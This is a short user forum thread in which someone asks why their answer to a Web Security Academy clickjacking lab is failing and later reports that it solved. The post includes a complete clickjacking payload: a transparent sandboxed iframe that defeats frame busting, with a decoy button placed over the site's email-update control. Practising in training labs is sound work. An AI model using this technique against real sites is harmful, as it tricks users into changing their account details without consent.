The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Clickjacking with a frame buster script proving problematic

Garth | Last updated: Jul 08, 2024 07:51PM UTC

I have tried several browsers, and read other issues on the clickjacking labs. Despite having the email planted and the correct iframe attribute annnnnnd the "Click me" right on top of "Update Email" this one does not want to be solved. <style> iframe { position:relative; width:500px; height: 700px; opacity: 0.0001; z-index: 2; } div { position:absolute; top:450px; left:70px; z-index: 1; } </style> <div>Click me</div> <iframe sandbox="allow-forms" src="https://0a1a004203e307cb854df53800b300f7.web-security-academy.net/my-account?id=wiener&email=moose@attacker-moose.com"></iframe> What did I miss?

Garth | Last updated: Jul 08, 2024 08:03PM UTC

Note that the id= is not in many of the attempts I used. This was just the latest one.

Garth | Last updated: Jul 08, 2024 08:30PM UTC

Belay this. It eventually solved. It may be do to the width of the target page?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.